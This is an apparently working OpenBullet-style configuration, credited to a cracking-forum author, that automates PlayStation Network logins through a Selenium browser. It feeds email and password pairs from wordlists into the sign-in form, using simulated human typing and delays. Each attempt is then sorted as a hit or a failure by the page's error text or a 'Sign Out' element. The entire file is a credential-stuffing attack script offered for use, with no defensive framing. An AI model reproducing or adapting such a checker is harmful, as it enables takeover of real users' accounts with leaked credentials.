[SETTINGS]
{
  "Name": "Selenium PSN",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2020-05-26T04:45:00.3771472-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "SWAT - Breakingin.to",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BROWSERACTION Open 

NAVIGATE "https://my.playstation.com/" 

FUNCTION Delay "3000" 

ELEMENTACTION XPath "//*[@id=\"sign-in-cta\"]" 
  Click 

FUNCTION Delay "5000" 

ELEMENTACTION XPath "//*[@id=\"ember20\"]" 
  Click 

ELEMENTACTION XPath "//*[@id=\"ember20\"]" 
  SendKeysHuman "<USER>" 

ELEMENTACTION XPath "//*[@id=\"ember21\"]/button" 
  Click 

FUNCTION Delay "2000" 

ELEMENTACTION XPath "//*[@id=\"ember38\"]" 
  Click 

ELEMENTACTION XPath "//*[@id=\"ember38\"]" 
  SendKeys "<PASS>" 

ELEMENTACTION XPath "//*[@id=\"ember40\"]/button" 
  Click 

FUNCTION Delay "2000" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The sign-in ID (email address) or password is not correct." 
  KEYCHAIN Success OR 
    KEY "Sign Out" 

BROWSERACTION Quit 

